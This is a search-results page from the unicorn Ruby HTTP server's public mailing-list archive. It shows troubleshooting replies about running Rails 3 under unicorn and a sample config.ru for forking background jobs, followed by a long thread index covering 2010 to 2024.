@ 2010-05-28 19:19  0%   ` Stefan Maier
  0 siblings, 0 replies; 200+ results
From: Stefan Maier @ 2010-05-28 19:19 UTC (permalink / raw)
  To: unicorn list

Am 28.05.10 20:49, schrieb Eric Wong:
> Stefan Maier <stefanmaier@gmail.com> wrote:
>> Hi,
>>
>> i'm trying to start up unicorn_rails with a rails 3 beta3 project. All I
>> can get out of it is this:
>> I, [2010-05-28T08:54:45.770957 #17852]  INFO -- : reaped
>> #<Process::Status: pid 17854 exit 1> worker=0
>> I, [2010-05-28T08:54:45.771200 #17852]  INFO -- : worker=0 spawning...
>> I, [2010-05-28T08:54:45.774049 #17858]  INFO -- : worker=0 spawned pid=17858
>> I, [2010-05-28T08:54:45.774350 #17858]  INFO -- : Refreshing Gem list
>>
>> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
>> `new': wrong number of arguments (1 for 2) (ArgumentError)
>> 	from
>> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
>> `method_missing'
> 
> <snip>
> 
>> Any ideas what's wrong?
> 
> Hi Stephan,
> 
> I've heard (but not confirmed myself) Rails 3 doesn't work well with
> Ruby 1.9.1, but does with 1.9.2dev (trunk), and 1.8.7.  Can you give
> either of those versions of Ruby a try?
> 
> Another thing that's probably not the issue here, but since config.ru is
> present, give "unicorn" a shot instead of "unicorn_rails" as the latter
> hasn't been tested heavily with Rails 3.  "unicorn_rails" was designed
> with older Rails in mind.
> 
> Let us know what you find, thanks!
> 

Hi Eric,
Using the config.ru with "unicorn" does indeed work.
If I have the time I'll investigate other ruby versions tomorrow.

Thanks,
Stefan Maier

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: unicorn failing to start
  @ 2010-05-28 18:49  4% ` Eric Wong
  2010-05-28 19:19  0%   ` Stefan Maier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-05-28 18:49 UTC (permalink / raw)
  To: unicorn list; +Cc: Stefan Maier

Stefan Maier <stefanmaier@gmail.com> wrote:
> Hi,
> 
> i'm trying to start up unicorn_rails with a rails 3 beta3 project. All I
> can get out of it is this:
> I, [2010-05-28T08:54:45.770957 #17852]  INFO -- : reaped
> #<Process::Status: pid 17854 exit 1> worker=0
> I, [2010-05-28T08:54:45.771200 #17852]  INFO -- : worker=0 spawning...
> I, [2010-05-28T08:54:45.774049 #17858]  INFO -- : worker=0 spawned pid=17858
> I, [2010-05-28T08:54:45.774350 #17858]  INFO -- : Refreshing Gem list
> 
> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
> `new': wrong number of arguments (1 for 2) (ArgumentError)
> 	from
> /usr/local/lib/ruby/gems/1.9.1/gems/activesupport-3.0.0.beta3/lib/active_support/deprecation/proxy_wrappers.rb:17:in
> `method_missing'

<snip>

> Any ideas what's wrong?

Hi Stephan,

I've heard (but not confirmed myself) Rails 3 doesn't work well with
Ruby 1.9.1, but does with 1.9.2dev (trunk), and 1.8.7.  Can you give
either of those versions of Ruby a try?

Another thing that's probably not the issue here, but since config.ru is
present, give "unicorn" a shot instead of "unicorn_rails" as the latter
hasn't been tested heavily with Rails 3.  "unicorn_rails" was designed
with older Rails in mind.

Let us know what you find, thanks!

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Forking off the unicorn master process to create a background worker
  @ 2010-05-26 21:05  0% ` Eric Wong
  2010-06-15 17:55  0%   ` Russell Branca
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2010-05-26 21:05 UTC (permalink / raw)
  To: unicorn list; +Cc: Russell Branca

Russell Branca <chewbranca@gmail.com> wrote:
> Hello,
> 
> I'm trying to find an efficient way to create a new instance of a
> rails application to perform some background tasks without having to
> load up the entire rails stack every time, so I figured forking off
> the master process would be a good way to go. Now I can easily just
> increment the worker count and then send a web request in, but the new
> worker would be part of the main worker pool, so in the time between
> spawning a new worker and sending the request, another request could
> have come in and snagged that worker. Is it possible to create a new
> worker and not have it enter the main worker pool so I could access it
> directly?

Hi Russell,

You could try having an endpoint in your webapp (with authentication, or
have it reject env['REMOTE_ADDR'] != '127.0.0.1') that runs the
background task for you.  Since it's a background app, you should
probably fork + Process.setsid + fork (or Process.daemon in 1.9), and
return an HTTP response immediately so your app can serve other
requests.

The following example should be enough to get you started (totally
untested)

------------ config.ru -------------
require 'rack/lobster'

map "/.seekrit_endpoint" do
  use Rack::ContentLength
  use Rack::ContentType, 'text/plain'
  run(lambda { |env|
    return [ 403, {}, [] ] if env['REMOTE_ADDR'] != '127.0.0.1'
    pid = fork
    if pid
      Process.waitpid(pid)

      # cheap way to avoid unintentional fd sharing with our children,
      # this causes the current Unicorn worker to exit after sending
      # the response:
      # Otherwise you'd have to be careful to disconnect+reconnect
      # databases/memcached/redis/whatever (in both the parent and
      # child) to avoid unintentional sharing that'll lead to headaches
      Process.kill(:QUIT, $$)

      [ 200, {}, [ "started background process\n" ] ]
    else
      # child, daemonize it so the unicorn master won't need to
      # reap it (that's the job of init)
      Process.setsid
      exit if fork

      begin
        # run your background code here instead of sleeping
        sleep 5
        env["rack.logger"].info "done sleeping"
      rescue => e
        env["rack.logger"].error(e.inspect)
      end
      # make sure we don't enter the normal response cycle back in the
      # worker...
      exit!(0)
    end
  })
end

map "/" do
  run Rack::Lobster.new
end

> I know this is not your typical use case for unicorn, and you're
> probably thinking there is a lot better ways to do this, however, I
> currently have a rails framework that powers a handful of standalone
> applications on a server with limited resources, and I'm trying to
> make a centralized queue that all the applications use, so the queue
> needs to be able to spawn a new worker for each of the applications
> efficiently, and incrementing/decrementing worker counts in unicorn is
> the most efficient way I've found to spawn a new rails instance.

Yeah, it's definitely an odd case and there are ways to shoot yourself
in the foot with it (especially with unintentional fd sharing), but Ruby
exposes all the Unix process management goodies better than most
languages (probably better than anything else I've used).

> Any help, suggestions or insight into this would be greatly appreciated.

Let us know how it goes :)

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

Results 1-200 of ~230   | reverse | options above
-- pct% links below jump to the message on this page, permalinks otherwise --
2010-05-25 18:53     Forking off the unicorn master process to create a background worker Russell Branca
2010-05-26 21:05  0% ` Eric Wong
2010-06-15 17:55  0%   ` Russell Branca
2010-06-15 22:14         ` Eric Wong
2010-06-15 22:51           ` Russell Branca
2010-06-16  0:06  4%         ` Eric Wong
2010-05-28  8:55     unicorn failing to start Stefan Maier
2010-05-28 18:49  4% ` Eric Wong
2010-05-28 19:19  0%   ` Stefan Maier
2010-06-14 19:46     Unicorn future plans Eric Wong
2010-06-14 20:58  3% ` John-Paul Bader
2010-06-14 22:10  0%   ` Eric Wong
     [not found]     <AANLkTilv4e_DPDKy440xotrlE7ucFIFXs74uHyGrzCKL@mail.gmail.com>
2010-06-22  0:16     ` [Mongrel] scaling unicorn Eric Wong
2010-06-22  2:34       ` Jamie Wilkinson
2010-06-22  4:53         ` Eric Wong
2010-06-22 18:03           ` snacktime
2010-06-22 18:57  4%         ` Jamie Wilkinson
2010-06-23  5:57     Purpose of "Status" header in HTTP responses? Craig Davey
2010-06-23  9:07  3% ` Eric Wong
2010-07-13 20:19     [ANN] unicorn 1.0.1 and 1.1.2 - fix rollbacks Eric Wong
2010-07-14  0:13     ` Lawrence Pit
2010-07-14  0:38       ` Eric Wong
2010-07-14  2:14         ` Lawrence Pit
2010-07-14  2:34           ` Eric Wong
2010-07-14  7:00             ` Lawrence Pit
2010-07-15 18:07               ` Jamie Wilkinson
2010-07-16  0:47  2%             ` Lawrence Pit
2010-08-17  1:29     running unicorn under rvm Joseph McDonald
2010-08-17  3:52     ` Eric Wong
2010-08-17 22:37  4%   ` Joseph McDonald
2010-08-18  1:08  0%     ` Eric Wong
2010-08-17 23:38     javascript disappears Jimmy Soho
2010-08-18  1:14     ` Eric Wong
2010-08-18  2:23       ` Jimmy Soho
2010-08-18  2:45         ` Eric Wong
2010-08-18  3:39  3%       ` Jimmy Soho
2010-10-22 19:50     502 bad gateway on nginx with recv() failed Naresh V
2010-10-22 21:14     ` Eric Wong
2010-10-23  4:48       ` Naresh V
2010-10-23 23:22         ` Eric Wong
2010-10-24  6:00  5%       ` Naresh V
2010-12-01 11:59     Unicorn and HAProxy, 500 Internal errors after checks Pierre
2010-12-01 16:52     ` Eric Wong
2010-12-01 17:14       ` Pierre
2010-12-01 19:58  4%     ` Eric Wong
2010-12-03  1:35     listen backlog ghazel
2010-12-03  2:39     ` Eric Wong
2010-12-03  5:31       ` ghazel
2010-12-03  7:35         ` Eric Wong
2010-12-03  9:16           ` ghazel
2010-12-03 21:49  4%         ` Eric Wong
2010-12-03 22:49  0%           ` ghazel
2010-12-04 23:48  0%             ` Eric Wong
2010-12-05  0:02  0%               ` ghazel
2011-01-06  7:20  3% [PATCH] close client socket after closing response body Eric Wong
2011-01-07  0:16  0% ` [ANN] unicorn 3.3.1 and 1.1.6 - one minor, esoteric bugfix Eric Wong
2011-03-22 19:19     unicorn 1.1.x never-ending listen loop IOError exceptions David Nghiem
2011-03-22 21:39     ` Eric Wong
2011-03-23  0:04       ` David Nghiem
2011-03-23  1:09  4%     ` Eric Wong
     [not found]     <BANLkTikFid3n0QpsrnXf2oNansFmuJDyuw@mail.gmail.com>
     [not found]     ` <BANLkTimF78PW9YgEAURS604Q8mucNwSDrg@mail.gmail.com>
2011-05-31 12:02       ` unicorn stuck in sched_yield after ERESTARTNOHAND Bharanee Rathna
2011-05-31 23:48         ` Eric Wong
2011-06-01  0:31  4%       ` Bharanee Rathna
2011-06-01  0:44  0%         ` Bharanee Rathna
2011-06-07  2:28  9% [PATCH] examples/nginx.conf: add ipv6only comment Eric Wong
2011-06-07 17:04 10% ` Eric Wong
2011-06-21  0:06     problem setting multiple cookies Eric Wong
2011-06-21  0:25     ` Jason Su
2011-06-21  0:46       ` Eric Wong
2011-06-21  1:34         ` Jason Su
2011-06-21  2:15           ` Eric Wong
2011-06-21  2:48             ` Jason Su
2011-06-21  3:15               ` Eric Wong
2011-06-21  3:38                 ` Jason Su
2011-06-21 18:29                   ` Eric Wong
2011-06-22  1:01                     ` Jason Su
2011-06-22  1:59  4%                   ` Eric Wong
2011-06-25 16:08     Unicorn and streaming in Rails 3.1 Xavier Noria
2011-06-25 20:16  5% ` Eric Wong
2011-06-25 22:23  0%   ` Xavier Noria
2011-06-25 20:33  4% ` Eric Wong
2011-07-06 10:21  4% Unicorn completely ignores USR2 signal Ehud Rosenberg
2011-07-06 17:42  0% ` Eric Wong
2011-07-07 23:02  0%   ` Ehud Rosenberg
2011-07-25 20:21     SIGTERM not actually killing processes Jesse Cooke
2011-07-25 21:22     ` Eric Wong
     [not found]       ` <DA420539FB904E888DB3B397DC431B7C@gmail.com>
     [not found]         ` <CAFgS5CxwCmHL65W39R2W73YfUK34WX50DS_JJF4L-d_tQuH86Q@mail.gmail.com>
2011-07-25 23:20  0%       ` Jesse Cooke
2011-08-02 20:09     Strange quit behavior James Cox
2011-08-02 21:53     ` Eric Wong
2011-08-02 22:46       ` James Cox
2011-08-02 23:08         ` Eric Wong
2011-08-02 23:49  4%       ` Alex Sharp
2011-08-05  4:09     Alex Sharp
2011-08-05  4:12     ` Alex Sharp
2011-08-05  8:07       ` Eric Wong
2011-08-17  4:26         ` Alex Sharp
2011-08-17  9:22           ` Eric Wong
2011-08-17 20:13             ` Eric Wong
2011-08-18 23:13               ` Alex Sharp
2011-08-19  1:53                 ` Eric Wong
2011-08-19  9:42                   ` Alex Sharp
2011-08-23  2:59                     ` Alex Sharp
2011-08-23  7:12                       ` Eric Wong
2011-08-23 16:49  4%                     ` Alex Sharp
2011-08-12  4:39     Rack content-length Rack::Lint::LintErrors errors with unicorn Joe Van Dyk
2011-08-12  5:42     ` Eric Wong
2011-08-12 18:09       ` Joe Van Dyk
2011-08-12 19:22  3%     ` Joe Van Dyk
2011-09-08  9:04  1% Sending ABRT to timeout-errant process before KILL J. Austin Hughey
2011-09-08 19:13  5% ` Eric Wong
2011-11-10 10:01     help with an init script Xavier Noria
2011-11-10 11:20  4% ` Eric Wong
2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
2011-11-15  2:00  0% ` Jason Su
2011-11-15  5:07  0% ` Christopher Bailey
2011-11-15 17:47  0% ` Alex Sharp
2011-11-21 23:14  4% Should USR2 always work? Laurens Pit
2011-11-22  1:16  0% ` Eric Wong
2012-02-29 14:34 14% [PATCH] Start the server if another user has a PID matching our stale pidfile Graham Bleach
2012-02-29 17:25 10% ` Eric Wong
2012-03-20 20:10  9%   ` Eric Wong
2012-03-09 21:48     Unicorn_rails ignores USR2 signal Yeung, Jeffrey
2012-03-09 22:24     ` Eric Wong
2012-03-09 22:39       ` Yeung, Jeffrey
2012-03-10  0:02         ` Eric Wong
2012-03-10  1:07           ` Yeung, Jeffrey
2012-03-10  1:30  5%         ` Eric Wong
2012-03-12 21:21  0%           ` Eric Wong
2012-03-12 22:39  0%             ` Yeung, Jeffrey
2012-03-12 22:44                   ` Eric Wong
2012-03-20 19:57                     ` Eric Wong
2012-03-20 23:09  3%                   ` Yeung, Jeffrey
2012-03-21  2:27  0%                     ` Devin Ben-Hur
2012-03-22  6:30  4% unicorn 4.2.1 release soon? Eric Wong
2012-03-26 21:45  4% [ANN] unicorn 4.2.1 - minor fix and doc updates Eric Wong
2012-04-12 17:36     Background jobs with #fork paddor
2012-04-12 20:39     ` Eric Wong
2012-04-12 22:41  6%   ` Patrik Wenger
2012-04-12 23:04  0%     ` Eric Wong
2012-04-27 14:36     app error: Socket is not connected (Errno::ENOTCONN) Joel Nimety
2012-04-27 18:59     ` Eric Wong
     [not found]       ` <CACsAZRR=NP4O+EB0koAr0aeUwth=M+5aQnA8vtVLEXqFHd=jnA@mail.gmail.com>
2012-04-27 19:51  0%     ` Eric Wong
2012-04-27 19:53  0%       ` Eric Wong
2012-04-27 20:30  0%       ` Matt Smith
2012-06-25 13:02     Address already in use Manuel Palenciano Guerrero
2012-06-25 20:28     ` Eric Wong
2012-06-25 21:03       ` Manuel Palenciano Guerrero
2012-06-25 23:57  4%     ` Eric Wong
     [not found]     <mailman.0.1345509654.31187.mongrel-unicorn@rubyforge.org>
2012-08-21  0:44     ` Unused Unicorn processes Konstantin Gredeskoul
2012-08-21  9:11  4%   ` Eric Wong
2012-08-22 18:16  0%     ` Konstantin Gredeskoul
2012-10-09  0:39  3% Is a client uploading a file a slow client from unicorn's point of view? Jimmy Soho
2012-10-09  1:58  0% ` Eric Wong
2012-10-18  6:33  4% Rack env rack.multiprocess true with single worker Petteri Räty
2012-10-18  7:53  0% ` Eric Wong
2012-10-29 17:44     Combating nginx 499 HTTP responses during flash traffic scenario Tom Burns
2012-10-29 18:45     ` Eric Wong
2012-10-29 21:53       ` Eric Wong
2012-10-29 22:21  4%     ` Tom Burns
2012-11-19 10:17     Number of worker processes on hyperthreaded processor Andrew Stewart
2012-11-19 11:23  4% ` Eric Wong
2013-01-19 22:57  0%   ` Jérémy Lecour
2012-11-25 23:27     pid file deleted briefly when doing hot restart Petteri Räty
2012-11-26  0:43  4% ` Eric Wong
     [not found]     <CA+c-+BYTxv+5mQ2MKeKVYEoxgPbi2QjwY6Oak-R_g65GhixEzg@mail.gmail.com>
2012-12-05  5:19     ` Fwd: Issue starting unicorn with non-ActiveRecord Rails app Peter Hall
2012-12-05  7:45  4%   ` Eric Wong
2013-01-20  7:36     preload_app = true causing - ActiveModel::MissingAttributeError: missing attribute: some_attr Avner Cohen
2013-01-20  8:04     ` Eric Wong
2013-01-20  8:10       ` Avner Cohen
2013-01-20  9:17         ` Eric Wong
2013-01-21  7:55  4%       ` Avner Cohen
2013-01-25 10:52  2% No middleware without touching RACK_ENV Lin Jen-Shin (godfat)
2013-01-25 18:39  0% ` Eric Wong
2013-01-29  3:21  3% [PATCH] Add -N or --no-default-middleware option Lin Jen-Shin
2013-05-08 23:01  9% [PATCH] HttpParser#next? becomes response_start_sent-aware Eric Wong
2013-05-15  8:52  4% Growing memory use of master process Andrew Stewart
2013-05-15  9:28  0% ` Eric Wong
2013-05-28 11:17  4% Unicorn freezes, requests got stuck in the queue most likely Alexander Dymo
2013-05-28 17:20  0% ` Eric Wong
2013-06-13 16:09     HEAD responses contain body Jonathan Rudenberg
2013-06-13 18:22     ` Eric Wong
2013-06-13 18:42       ` Jonathan Rudenberg
2013-06-13 19:21  4%     ` Eric Wong
2013-06-13 19:28  0%       ` Jonathan Rudenberg
2013-06-13 19:34  0%         ` Jonathan Rudenberg
2013-08-20 14:47     A barrage of unexplained timeouts nick
2013-08-20 16:37     ` Eric Wong
2013-08-20 17:27       ` nick
2013-08-20 17:40         ` Eric Wong
2013-08-20 18:11           ` nick
2013-08-20 18:49             ` Eric Wong
2013-08-20 20:03               ` nick
2013-08-20 20:42                 ` Eric Wong
2013-08-20 21:19                   ` nick
2013-08-20 21:32  4%                 ` Eric Wong
2013-08-21 13:33  0%                   ` nick
2013-09-24 16:02     IOError: closed stream David Judd
2013-09-24 17:39  3% ` Eric Wong
2013-09-29 20:13     More unexplained timeouts nick
2013-09-30  0:06  4% ` Eric Wong
2013-10-23 22:55  4% pid file handling issue Michael Fischer
2013-10-24  0:53  0% ` Eric Wong
2013-10-24  1:01  4%   ` Michael Fischer
2013-10-24  2:03  0%     ` Eric Wong
2013-10-24 17:51  0%       ` Michael Fischer
2013-10-24 18:21  0%         ` Eric Wong
2013-10-24 11:08     Forking non web processes Sam Saffron
2013-10-24 16:17     ` Eric Wong
2013-10-24 16:25  6%   ` Alex Sharp
2013-11-05 14:46     Handling closed clients Andrew Hobson
2013-11-05 17:20     ` Eric Wong
     [not found]       ` <m2iow6k7nk.fsf@macdaddy.atl.damballa>
2013-11-05 20:51  7%     ` Eric Wong
     [not found]           ` <m21u2sjpc9.fsf@macdaddy.atl.damballa>
2013-11-07 16:48  0%         ` Eric Wong
2013-11-07 20:22  0%           ` [PATCH] stream_input: avoid IO#close on client disconnect Eric Wong
2013-11-26  1:00  3% Issues with PID file renaming Jimmy Soho
2013-11-26  1:20  0% ` Eric Wong
2013-12-09  9:52     [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
2013-12-10  0:22     ` Sam Saffron
2013-12-10  1:58  4%   ` Eric Wong
2014-01-27 16:56  5% listen loop error in 4.8.0 Eric Wong
2014-05-02 23:15  4% [RFC/PATCH] http_server: handle premature grandparent death Eric Wong
2014-05-07  8:05     [ANN] unicorn 4.8.3 - the end of an era Eric Wong
2014-05-07  9:30     ` Jérémy Lecour
2014-05-07  9:46       ` Eric Wong
2014-05-07 20:33  6%     ` Michael Fischer
2014-05-07 21:25  0%       ` Eric Wong
2014-05-07 12:08  5% ` Bráulio Bhavamitra
2014-06-05 17:39     Dealing with big uploads and/or slow clients Bráulio Bhavamitra
2014-06-06  1:27     ` Eric Wong
2014-06-06  2:51       ` Sam Saffron
2014-06-06  5:59  5%     ` Eric Wong
2014-08-02  7:51     Please move to github Gary Grossman
2014-08-02  8:50  3% ` Eric Wong
2014-08-02 19:07  0%   ` Gary Grossman
2014-08-02 19:33         ` Michael Fischer
2014-08-04  7:22           ` Hongli Lai
2014-08-04  8:48  6%         ` Rack encodings (was: Please move to github) Eric Wong
2014-08-04  9:46  0%           ` Hongli Lai
2014-08-05  5:56  4% Gary Grossman
2014-08-05  6:28  0% ` Eric Wong
2014-10-03 11:34     Master hooks needed Bráulio Bhavamitra
2014-10-03 12:22  4% ` Eric Wong
2014-10-03 12:36  0%   ` Valentin Mihov
2014-10-04  0:53  0%   ` Bráulio Bhavamitra
2014-10-09 12:24  4% Reserved workers not as webservers Bráulio Bhavamitra
2014-10-24 19:13     Having issue with Unicorn Eric Wong
2014-10-24 19:29     ` Imdad
2014-10-24 19:41       ` Eric Wong
2014-10-24 19:58         ` Imdad
2014-10-24 20:06           ` Eric Wong
2014-10-24 20:09             ` Imdad
2014-10-24 20:17               ` Eric Wong
2014-10-24 20:35                 ` Imdad
2014-10-24 20:40                   ` Eric Wong
2014-10-24 20:45                     ` Imdad
2014-10-24 20:58  5%                   ` Eric Wong
2014-10-24 21:24  0%                     ` Imdad
2014-11-12 19:46     Issue with Unicorn: Big latency when getting a request Roberto Cordoba del Moral
2014-11-13  7:12     ` Roberto Cordoba del Moral
2014-11-13 21:03       ` Eric Wong
2014-11-14  6:46         ` Roberto Cordoba del Moral
2014-11-14  7:19           ` Eric Wong
2014-11-14  9:09             ` Roberto Cordoba del Moral
2014-11-14  9:32               ` Roberto Cordoba del Moral
2014-11-14 10:02                 ` Eric Wong
2014-11-14 10:12                   ` Roberto Cordoba del Moral
2014-11-14 10:15                     ` Roberto Cordoba del Moral
2014-11-14 10:28  5%                   ` Eric Wong
2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
2014-11-16  8:32     [RFC] http: TypedData C-API conversion Eric Wong
2014-12-28  7:06     ` Eric Wong
2014-12-28  7:17  4%   ` [PATCH] tmpio: drop the "size" method Eric Wong
2014-12-30 16:38     Unicorn workers timing out intermittently Aaron Price
2014-12-30 18:12  0% ` Eric Wong
2014-12-30 20:02  0%   ` Aaron Price
2015-01-22  5:12  4% [RFC] remove old inetd+git examples and exec_cgi Eric Wong
2015-01-29 13:06     Timeouts longer than expected Antony Gelberg
2015-01-29 20:00  5% ` Eric Wong
2015-02-16  2:19     Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
2015-02-18  9:15  3% ` Eric Wong
2015-03-03 22:24     Request Queueing after deploy + USR2 restart Sarkis Varozian
2015-03-03 22:32     ` Michael Fischer
2015-03-04 19:48       ` Sarkis Varozian
2015-03-04 19:51         ` Michael Fischer
2015-03-04 19:58           ` Sarkis Varozian
2015-03-04 20:17             ` Michael Fischer
2015-03-04 20:24  4%           ` Sarkis Varozian
2015-03-04 20:27  0%             ` Michael Fischer
2015-03-04 20:35  0%             ` Eric Wong
2015-03-04 20:40  0%               ` Sarkis Varozian
2015-03-05 17:07  0%                 ` Sarkis Varozian
2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
2015-03-05 17:28  0%                     ` Sarkis Varozian
2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
2015-03-12  1:04     On USR2, new master runs with same PID Kevin Yank
2015-03-12  1:45  4% ` Eric Wong
2015-03-12  6:26  0%   ` Kevin Yank
2015-03-24 22:43     nginx reverse proxy getting ECONNRESET Michael Fischer
2015-03-24 22:54     ` Eric Wong
2015-03-24 22:59  5%   ` Eric Wong
2015-03-24 23:04  0%     ` Michael Fischer
2015-03-24 23:23  0%       ` Eric Wong
2015-04-07 23:22  4% possible errors reading mailing list archives Eric Wong
2015-06-15 22:56     [ANN] unicorn 5.0.0.pre1 - incompatible changes! Eric Wong
2015-07-06 21:41  9% ` [ANN] unicorn 5.0.0.pre2 - another prerelease! Eric Wong
2015-06-26 22:18  4% Does the the environment is preserved on USR2? Bráulio Bhavamitra
2015-07-05  0:31  4% [PATCH] test/unit/test_response.rb: compatibility with older test-unit Eric Wong
2015-07-15 22:05  2% [PATCH] doc: remove references to old servers Eric Wong
2015-10-14 20:12  4% unicorn non-technical FAQ Eric Wong
2015-11-16 23:43     undefined method `include?' for nil:NilClass (NoMethodError) Owen Ou
2015-11-17  0:27  3% ` Eric Wong
     [not found]     <CAOxZbrXuC-MTZjkQOREorkv8k4Cu9X3M5f_R1p8LYO+QyJhBug@mail.gmail.com>
2016-05-26 21:57  3% ` Unicorn is a famous and widely use software, but why official website look so outdate? Eric Wong
2016-12-12  2:10     WTF is up with memory usage nowadays? Eric Wong
2017-02-08 20:00  4% ` Eric Wong
2017-02-22 12:02     check_client_connection using getsockopt(2) Simon Eskildsen
2017-02-22 18:33  4% ` Eric Wong
2017-02-22 20:09  3%   ` Simon Eskildsen
2017-02-23  1:42  4%     ` Eric Wong
2017-02-23  2:42  0%       ` Simon Eskildsen
2017-02-23  3:52  5%         ` Eric Wong
2017-02-25 14:03  4% [PATCH] check_client_connection: use tcp state on linux Simon Eskildsen
2017-02-25 16:19  0% ` Simon Eskildsen
2017-02-25 23:12  0%   ` Eric Wong
2017-02-27 11:44         ` Simon Eskildsen
2017-02-28 21:12           ` Eric Wong
2017-03-01  3:18             ` Eric Wong
2017-03-06 21:32  2%           ` Simon Eskildsen
2017-03-07 22:50  0%             ` Eric Wong
2017-07-13 18:48     Random crash when sending USR2 + QUIT signals to Unicorn process Pere Joan Martorell
2017-07-13 19:34  5% ` Eric Wong
2017-07-14 10:21  0%   ` Pere Joan Martorell
2017-08-04 16:40  4% initialize/fork crash in macOS 10.13 Jeffrey Carl Faden
2017-09-14  8:25     Bug, probably related to Unicoen Felix Yasnopolski
2017-09-14  9:15     ` Eric Wong
2017-09-27  7:05  5%   ` Eric Wong
2017-12-23 23:42  4% [ANN] unicorn 5.4.0 - Rack HTTP server for fast clients and Unix Eric Wong
2018-01-14 23:27     Log URL with murder_lazy_workers Sam Saffron
2018-01-15  1:57     ` Eric Wong
2018-01-15  2:18       ` Sam Saffron
     [not found]         ` <CADGZSScpXo7-PvM=Ki64hhPSzWAsjyT+fWKAZ9-30U69x+54iA@mail.gmail.com>
2018-01-15  3:22  4%       ` Sam Saffron
2019-03-06  1:47  5% Issues after 5.5.0 upgrade Stan Pitucha
2019-03-06  2:48     ` Eric Wong
2019-03-06  4:07  4%   ` Stan Pitucha
2019-03-06  4:44  0%     ` Eric Wong
2019-03-06  5:57  0%       ` Jeremy Evans
2019-05-12 22:25     [PATCH 0/3] slow clients and test/benchmark tools Eric Wong
2019-05-12 22:25  7% ` [PATCH 1/3] test/benchmark/ddstream: demo for slowly reading clients Eric Wong
2019-05-26  5:24 10% yet-another-horribly-named-server as an nginx alternative Eric Wong
2019-12-16 22:34  4% Traffic priority with Unicorn Bertrand Paquet
2019-12-17  5:12  0% ` Eric Wong
2019-12-18 22:06  0%   ` Bertrand Paquet
2020-04-15  5:06  4% Sustained queuing on one listener can block requests from other listeners Stan Hu
2020-04-15  5:26  0% ` Eric Wong
2020-04-16  5:46  0%   ` Stan Hu
2020-09-01 12:17     [PATCH] Update ruby_version requirement to allow ruby 3.0 Jean Boussier
2020-09-01 14:48     ` Eric Wong
2020-09-01 15:04       ` Jean Boussier
2020-09-01 15:41         ` Eric Wong
2020-09-03  7:52  4%       ` Jean Boussier
2020-09-03  8:25  0%         ` Eric Wong
2020-09-03  8:29  0%           ` Jean Boussier
2020-09-03  9:31  0%             ` Eric Wong
2020-09-03 11:23                   ` Jean Boussier
2020-09-04 12:34                     ` Jean Boussier
2020-09-06  9:30                       ` Eric Wong
2020-09-07  7:13                         ` Jean Boussier
2020-09-08  2:24                           ` Eric Wong
2020-09-08  8:00                             ` Jean Boussier
2020-09-08  8:50  6%                           ` Eric Wong
2020-11-26 11:59     [RFC] http_response: ignore invalid header response characters Eric Wong
2021-01-06 17:53     ` Eric Wong
2021-01-13 23:20  3%   ` Sam Sanoop
2021-01-14  4:37         ` Eric Wong
2021-01-28 17:29           ` Sam Sanoop
2021-01-28 22:39  5%         ` Eric Wong
2021-02-17 21:46  0%           ` Sam Sanoop
     [not found]     <F6712BF3-A4DD-41EE-8252-B9799B35E618@github.com>
     [not found]     ` <20210311030250.GA1266@dcvr>
     [not found]       ` <7F6FD017-7802-4871-88A3-1E03D26D967C@github.com>
2021-03-12  9:41         ` Potential Unicorn vulnerability Eric Wong
2021-03-12 11:14           ` Dirkjan Bussink
2021-03-12 12:00  4%         ` Eric Wong
2021-03-12 12:24  0%           ` Dirkjan Bussink
2022-07-05 20:05     [PATCH] Master promotion with SIGURG (CoW optimization) Jean Boussier
2022-07-06  2:33  3% ` Eric Wong
2022-07-06  7:40  2%   ` Jean Boussier
2022-07-07 10:23  3%     ` Eric Wong
     [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
     [not found]             ` <CANPRWbGArasDtbAej4LsCOGeYZSrNz87p5kLjG+x__jHAn-5ng@mail.gmail.com>
2022-07-08  0:13  2%           ` Eric Wong
2022-07-08  0:30  0%         ` Eric Wong
2022-07-08  7:46     [PATCH] Make the gem usable as a git gem Jean Boussier
2022-07-08 12:12  4% ` Eric Wong
2023-03-01 23:12     [PATCH] epollexclusive: avoid Ruby object allocation for buffer Eric Wong
2023-03-22 12:53     ` Jean Boussier
2023-03-28 12:24  5%   ` [PATCH] epollexclusive: use maxevents=1 for epoll_wait Eric Wong
2023-06-05 10:32  1% [PATCH 00-23/23] start porting tests to Perl5 Eric Wong
2023-09-05  9:44  1% [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio Eric Wong
2024-03-23 19:45  1% [PATCH 0/4] a small pile of patches Eric Wong
2024-05-06 20:10  1% [PATCH 0/5..5/5] more tests to Perl 5 for stability Eric Wong

Code repositories for project(s) associated with this public inbox

	https://yhbt.net/unicorn.git/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).